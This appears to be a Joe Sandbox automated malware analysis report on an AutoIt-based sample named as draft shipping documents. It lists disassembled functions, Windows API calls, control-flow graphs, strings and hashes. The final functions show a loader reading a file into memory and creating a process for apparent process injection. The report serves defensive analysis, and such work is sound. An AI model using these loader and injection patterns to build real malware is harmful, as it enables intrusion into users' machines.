                                                                • LoadIconW.USER32(000000A4), ref: 00933A88
                                                                • LoadIconW.USER32(000000A2), ref: 00933A9A
                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00933AC0
                                                                • RegisterClassExW.USER32(?), ref: 00933B16
                                                                  • Part of subcall function 00933041: GetSysColorBrush.USER32(0000000F), ref: 00933074
                                                                  • Part of subcall function 00933041: RegisterClassExW.USER32(00000030), ref: 0093309E
                                                                  • Part of subcall function 00933041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009330AF
                                                                  • Part of subcall function 00933041: InitCommonControlsEx.COMCTL32(?), ref: 009330CC
                                                                  • Part of subcall function 00933041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009330DC
                                                                  • Part of subcall function 00933041: LoadIconW.USER32(000000A9), ref: 009330F2
                                                                  • Part of subcall function 00933041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00933101
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                • String ID: #$0$0`$AutoIt v3
                                                                • API String ID: 423443420-1829940692
                                                                • Opcode ID: 4a1dcff8d02e3c46c1de8dc59c5a57f52418c53c25baa27b33dfa0c7e6befddf
                                                                • Instruction ID: 4c6087d215a9af03c28b10b4ff633203f5344dfd91eb244e028408512fa778e7
                                                                • Opcode Fuzzy Hash: 4a1dcff8d02e3c46c1de8dc59c5a57f52418c53c25baa27b33dfa0c7e6befddf
                                                                • Instruction Fuzzy Hash: 46216D70D28704AFEB10DFA4ED49BAD7FB4FB08721F114259E620A62B1C7B55640EF80
                                                                Function 00933041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetSysColorBrush.USER32(0000000F), ref: 00933074
                                                                • RegisterClassExW.USER32(00000030), ref: 0093309E
                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009330AF
                                                                • InitCommonControlsEx.COMCTL32(?), ref: 009330CC
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009330DC
                                                                • LoadIconW.USER32(000000A9), ref: 009330F2
                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00933101
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                • API String ID: 2914291525-1005189915
                                                                • Opcode ID: 0a4ff22aa1b6046ecf8387fd7e329ef7549a7cf9a9d0ffa101f28c3704ab56a4
                                                                • Instruction ID: 9ba8d95a59d70effb7106b4f0aed859750de90f109dd6ab34468cc63634835d1
                                                                • Opcode Fuzzy Hash: 0a4ff22aa1b6046ecf8387fd7e329ef7549a7cf9a9d0ffa101f28c3704ab56a4
                                                                • Instruction Fuzzy Hash: A821C9B1925718AFDB00DF94ED89BDDBBF4FB08750F11422AF610A62A0D7B14544DF91
                                                                Function 00933633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 767 933633-933681 769 933683-933686 767->769 770 9336e1-9336e3 767->770 772 9336e7 769->772 773 933688-93368f 769->773 770->769 771 9336e5 770->771 776 9336ca-9336d2 DefWindowProcW 771->776 777 96d0cc-96d0fa call 941070 call 941093 772->777 778 9336ed-9336f0 772->778 774 933695-93369a 773->774 775 93374b-933753 PostQuitMessage 773->775 780 96d154-96d168 call 992527 774->780 781 9336a0-9336a2 774->781 782 933711-933713 775->782 783 9336d8-9336de 776->783 811 96d0ff-96d106 777->811 784 9336f2-9336f3 778->784 785 933715-93373c SetTimer RegisterWindowMessageW 778->785 780->782 804 96d16e 780->804 787 933755-93375f call 9344a0 781->787 788 9336a8-9336ad 781->788 782->783 791 96d06f-96d072 784->791 792 9336f9-93370c KillTimer call 93443a call 933114 784->792 785->782 789 93373e-933749 CreatePopupMenu 785->789 805 933764 787->805 794 9336b3-9336b8 788->794 795 96d139-96d140 788->795 789->782 798 96d074-96d076 791->798 799 96d0a8-96d0c7 MoveWindow 791->799 792->782 802 96d124-96d134 call 992d36 794->802 803 9336be-9336c4 794->803 795->776 809 96d146-96d14f call 987c36 795->809 806 96d097-96d0a3 SetFocus 798->806 807 96d078-96d07b 798->807 799->782 802->782 803->776 803->811 804->776 805->782 806->782 807->803 812 96d081-96d092 call 941070 807->812 809->776 811->776 816 96d10c-96d11f call 93443a call 93434a 811->816 812->782 816->776
                                                                APIs
                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 009336D2
                                                                • KillTimer.USER32(?,00000001), ref: 009336FC
                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0093371F
                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0093372A
                                                                • CreatePopupMenu.USER32 ref: 0093373E
                                                                • PostQuitMessage.USER32(00000000), ref: 0093374D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                • String ID: TaskbarCreated
                                                                • API String ID: 129472671-2362178303
                                                                • Opcode ID: bb30d7526ae413f57bd558fbddc65d99479066cc8804cfd0eb5e263a2aab7ffc
                                                                • Instruction ID: 2f29dbddfcb6de289a800763ff830fb6b6b72395fea4e41c7efced40c424d37f
                                                                • Opcode Fuzzy Hash: bb30d7526ae413f57bd558fbddc65d99479066cc8804cfd0eb5e263a2aab7ffc
                                                                • Instruction Fuzzy Hash: F7419DB2698509BFDF246F78DD4BBB93B9CEB40300F114625F702862B1CA659E40EF61
                                                                Function 00933766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                • API String ID: 1825951767-3513169116
                                                                • Opcode ID: c1454644c700ed5b1d68c4b3bd092f7564f11e5ad901a2b66060f0310b3c8083
                                                                • Instruction ID: 43dc300fc370207d030c4b56e10c0f95c0f1e66ea9e3196aa3e6e55254e84e90
                                                                • Opcode Fuzzy Hash: c1454644c700ed5b1d68c4b3bd092f7564f11e5ad901a2b66060f0310b3c8083
                                                                • Instruction Fuzzy Hash: C6A17B7191421DABCB14EBA4DC91BFEB7B8BF94310F414529F426A7191EF746A08CFA0
                                                                Function 010D8BE8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 942 10d8be8-10d8c96 call 10d6618 945 10d8c9d-10d8cc3 call 10d9af8 CreateFileW 942->945 948 10d8cca-10d8cda 945->948 949 10d8cc5 945->949 956 10d8cdc 948->956 957 10d8ce1-10d8cfb VirtualAlloc 948->957 950 10d8e15-10d8e19 949->950 951 10d8e5b-10d8e5e 950->951 952 10d8e1b-10d8e1f 950->952 958 10d8e61-10d8e68 951->958 954 10d8e2b-10d8e2f 952->954 955 10d8e21-10d8e24 952->955 961 10d8e3f-10d8e43 954->961 962 10d8e31-10d8e3b 954->962 955->954 956->950 963 10d8cfd 957->963 964 10d8d02-10d8d19 ReadFile 957->964 959 10d8ebd-10d8ed2 958->959 960 10d8e6a-10d8e75 958->960 967 10d8ed4-10d8edf VirtualFree 959->967 968 10d8ee2-10d8eea 959->968 965 10d8e79-10d8e85 960->965 966 10d8e77 960->966 969 10d8e45-10d8e4f 961->969 970 10d8e53 961->970 962->961 963->950 971 10d8d1b 964->971 972 10d8d20-10d8d60 VirtualAlloc 964->972 975 10d8e99-10d8ea5 965->975 976 10d8e87-10d8e97 965->976 966->959 967->968 969->970 970->951 971->950 973 10d8d67-10d8d82 call 10d9d48 972->973 974 10d8d62 972->974 982 10d8d8d-10d8d97 973->982 974->950 979 10d8ea7-10d8eb0 975->979 980 10d8eb2-10d8eb8 975->980 978 10d8ebb 976->978 978->958 979->978 980->978 983 10d8d99-10d8dc8 call 10d9d48 982->983 984 10d8dca-10d8dde call 10d9b58 982->984 983->982 990 10d8de0 984->990 991 10d8de2-10d8de6 984->991 990->950 992 10d8de8-10d8dec CloseHandle 991->992 993 10d8df2-10d8df6 991->993 992->993 994 10d8df8-10d8e03 VirtualFree 993->994 995 10d8e06-10d8e0f 993->995 994->995 995->945 995->950
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010D8CB9
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010D8EDF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708705720.00000000010D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 010D6000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10d6000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CreateFileFreeVirtual
                                                                • String ID:
                                                                • API String ID: 204039940-0
                                                                • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                • Instruction ID: d0684a698ca5e65812d135a1bcc7a99848424c746365dba7f4db0edca6ef7803
                                                                • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                • Instruction Fuzzy Hash: 8EA10B70E00309EBDB14DFA4C894BEEBBB5BF48305F208599E655BB281D7755A40CF94
                                                                Function 009339D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1073 9339d5-933a45 CreateWindowExW * 2 ShowWindow * 2
                                                                APIs
                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00933A03
                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00933A24
                                                                • ShowWindow.USER32(00000000,?,?), ref: 00933A38
                                                                • ShowWindow.USER32(00000000,?,?), ref: 00933A41
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$CreateShow
                                                                • String ID: AutoIt v3$edit
                                                                • API String ID: 1584632944-3779509399
                                                                • Opcode ID: 872e66c2df0da91c3b600024873ef05271a5533e51e921d00b5f24a67ec371c5
                                                                • Instruction ID: 95543a57293e472a344007bef575e02c0b83f516e3adb6ef83b36aeda950b28a
                                                                • Opcode Fuzzy Hash: 872e66c2df0da91c3b600024873ef05271a5533e51e921d00b5f24a67ec371c5
                                                                • Instruction Fuzzy Hash: B5F03A705256907EEA306B2B6C5CEBB2E7DD7C6F60B02022ABA10A2170C6610800EAB0
                                                                Function 010D89C8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1074 10d89c8-10d8ae8 call 10d6618 call 10d88b8 CreateFileW 1081 10d8aef-10d8aff 1074->1081 1082 10d8aea 1074->1082 1085 10d8b06-10d8b20 VirtualAlloc 1081->1085 1086 10d8b01 1081->1086 1083 10d8b9f-10d8ba4 1082->1083 1087 10d8b24-10d8b3b ReadFile 1085->1087 1088 10d8b22 1085->1088 1086->1083 1089 10d8b3d 1087->1089 1090 10d8b3f-10d8b79 call 10d88f8 call 10d78b8 1087->1090 1088->1083 1089->1083 1095 10d8b7b-10d8b90 call 10d8948 1090->1095 1096 10d8b95-10d8b9d ExitProcess 1090->1096 1095->1096 1096->1083
                                                                APIs
                                                                  • Part of subcall function 010D88B8: Sleep.KERNELBASE(000001F4), ref: 010D88C9
                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010D8ADE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708705720.00000000010D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 010D6000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10d6000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CreateFileSleep
                                                                • String ID: 8JXJJA3K61T
                                                                • API String ID: 2694422964-87512190
                                                                • Opcode ID: 90667a343e5eb24981343aa3b603085b2be27ff894635e2f1768b955a502b915
                                                                • Instruction ID: e73a918a8e913e200a7f3921e334e137572330e49e39456789d0cafbf7fe0d21
                                                                • Opcode Fuzzy Hash: 90667a343e5eb24981343aa3b603085b2be27ff894635e2f1768b955a502b915
                                                                • Instruction Fuzzy Hash: 67518D70D04349EAEB11DBA4C815BEEBB78EF19310F008199E648BB2C0D7791B49CBA5
                                                                Function 0093407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1098 93407c-934092 1099 934098-9340ad call 937a16 1098->1099 1100 93416f-934173 1098->1100 1103 9340b3-9340d3 call 937bcc 1099->1103 1104 96d3c8-96d3d7 LoadStringW 1099->1104 1107 96d3e2-96d3fa call 937b2e call 936fe3 1103->1107 1108 9340d9-9340dd 1103->1108 1104->1107 1117 9340ed-93416a call 952de0 call 93454e call 952dbc Shell_NotifyIconW call 935904 1107->1117 1120 96d400-96d41e call 937cab call 936fe3 call 937cab 1107->1120 1110 9340e3-9340e8 call 937b2e 1108->1110 1111 934174-93417d call 938047 1108->1111 1110->1117 1111->1117 1117->1100 1120->1117
                                                                APIs
                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0096D3D7
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                • _memset.LIBCMT ref: 009340FC
                                                                • _wcscpy.LIBCMT ref: 00934150
                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00934160
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                • String ID: Line:
                                                                • API String ID: 3942752672-1585850449
                                                                • Opcode ID: ca65bb812c44d18c9930f8ce9e5f0b5578c204b774aabd9f1277cefbe3e20b9c
                                                                • Instruction ID: c8b2ed915da6f9fccf4ef292a4f167163c80a6e44a31602d3b1929185878ab0b
                                                                • Opcode Fuzzy Hash: ca65bb812c44d18c9930f8ce9e5f0b5578c204b774aabd9f1277cefbe3e20b9c
                                                                • Instruction Fuzzy Hash: DE31CF7110C705ABD335EBA0DC46FEBB7ECAF84314F114A1AF695921A1DB74A648CF82
                                                                Function 0093686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1133 93686a-936891 call 934ddd 1136 936897-9368a5 call 934ddd 1133->1136 1137 96e031-96e041 call 99955b 1133->1137 1136->1137 1142 9368ab-9368b1 1136->1142 1141 96e046-96e048 1137->1141 1143 96e067-96e0af call 950db6 1141->1143 1144 96e04a-96e04d call 934e4a 1141->1144 1146 96e052-96e061 call 9942f8 1142->1146 1147 9368b7-9368d9 call 936a8c 1142->1147 1152 96e0d4 1143->1152 1153 96e0b1-96e0bb 1143->1153 1144->1146 1146->1143 1157 96e0d6-96e0e9 1152->1157 1156 96e0cf-96e0d0 1153->1156 1158 96e0d2 1156->1158 1159 96e0bd-96e0cc 1156->1159 1160 96e260-96e263 call 952d55 1157->1160 1161 96e0ef 1157->1161 1158->1157 1159->1156 1164 96e268-96e271 call 934e4a 1160->1164 1163 96e0f6-96e0f9 call 937480 1161->1163 1167 96e0fe-96e120 call 935db2 call 9973e9 1163->1167 1170 96e273-96e283 call 937616 call 935d9b 1164->1170 1176 96e134-96e13e call 9973d3 1167->1176 1177 96e122-96e12f 1167->1177 1184 96e288-96e2b8 call 98f7a1 call 950e2c call 952d55 call 934e4a 1170->1184 1186 96e140-96e153 1176->1186 1187 96e158-96e162 call 9973bd 1176->1187 1179 96e227-96e22e call 93750f 1177->1179 1185 96e233-96e237 1179->1185 1184->1170 1185->1167 1189 96e23d-96e25a call 93735d 1185->1189 1186->1179 1196 96e176-96e180 call 935e2a 1187->1196 1197 96e164-96e171 1187->1197 1189->1160 1189->1163 1196->1179 1203 96e186-96e19e call 98f73d 1196->1203 1197->1179 1208 96e1a0-96e1bf call 937de1 call 935904 1203->1208 1209 96e1c1-96e1c4 1203->1209 1232 96e1e2-96e1f0 call 935db2 1208->1232 1211 96e1c6-96e1e1 call 937de1 call 936839 call 935904 1209->1211 1212 96e1f2-96e1f5 1209->1212 1211->1232 1214 96e1f7-96e200 call 98f65e 1212->1214 1215 96e215-96e218 call 99737f 1212->1215 1214->1184 1225 96e206-96e210 call 950e2c 1214->1225 1222 96e21d-96e226 call 950e2c 1215->1222 1222->1179 1225->1167 1232->1222
                                                                APIs
                                                                  • Part of subcall function 00934DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00934E0F
                                                                • _free.LIBCMT ref: 0096E263
                                                                • _free.LIBCMT ref: 0096E2AA
                                                                  • Part of subcall function 00936A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00936BAD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                • API String ID: 2861923089-1757145024
                                                                • Opcode ID: 817679a7723efffee73da7983eb6496914f50964b8470406fade5de8de5fd8c9
                                                                • Instruction ID: 1a0f4a92c0c721965d758d8cf92a9d2e4ab37e1637b934babb4e650924e44add
                                                                • Opcode Fuzzy Hash: 817679a7723efffee73da7983eb6496914f50964b8470406fade5de8de5fd8c9
                                                                • Instruction Fuzzy Hash: 2F916B75914219AFCF14EFA4CC92AEEB7B9FF49310F10442AF815AB2A1DB74A905CF50
                                                                Function 0093F76F Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00950162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00950193
                                                                  • Part of subcall function 00950162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0095019B
                                                                  • Part of subcall function 00950162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009501A6
                                                                  • Part of subcall function 00950162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009501B1
                                                                  • Part of subcall function 00950162: MapVirtualKeyW.USER32(00000011,00000000), ref: 009501B9
                                                                  • Part of subcall function 00950162: MapVirtualKeyW.USER32(00000012,00000000), ref: 009501C1
                                                                  • Part of subcall function 009460F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0093F930), ref: 00946154
                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0093F9CD
                                                                • OleInitialize.OLE32(00000000), ref: 0093FA4A
                                                                • CloseHandle.KERNEL32(00000000), ref: 009745C8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                • String ID: `2
                                                                • API String ID: 1986988660-1895914145
                                                                • Opcode ID: 28a193a167104445f27d62db3c390928e0061cdde12273c84c429fa12eb2b693
                                                                • Instruction ID: b4636235b1e828174b5db13e7e66057747707654fa4b2222fb1abd9d8ee9208d
                                                                • Opcode Fuzzy Hash: 28a193a167104445f27d62db3c390928e0061cdde12273c84c429fa12eb2b693
                                                                • Instruction Fuzzy Hash: 75819DB0929F40CFC394EF69A9556397BE5EB98306753812AE319CB272E7B04484EF11
                                                                Function 009335B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,009335A1,SwapMouseButtons,00000004,?), ref: 009335D4
                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,009335A1,SwapMouseButtons,00000004,?,?,?,?,00932754), ref: 009335F5
                                                                • RegCloseKey.KERNELBASE(00000000,?,?,009335A1,SwapMouseButtons,00000004,?,?,?,?,00932754), ref: 00933617
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID: Control Panel\Mouse
                                                                • API String ID: 3677997916-824357125
                                                                • Opcode ID: f6aa28d8181256e97f76c63d533020319fd34e2b0db0827f0a733dd63f9b9a3c
                                                                • Instruction ID: 69691a27970bf000d82d8fc9e6d5442232d0551f7fd6f461ea9a45c6e9a2ca95
                                                                • Opcode Fuzzy Hash: f6aa28d8181256e97f76c63d533020319fd34e2b0db0827f0a733dd63f9b9a3c
                                                                • Instruction Fuzzy Hash: 67115A71954208BFDB209F65DC42DAEB7BCEF05754F008569F805D7210D2719F40AB60
                                                                Function 010D78B8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 010D8073
                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010D8109
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010D812B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708705720.00000000010D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 010D6000, based on PE: false
                                                                Joe Sandbox IDA Plugin
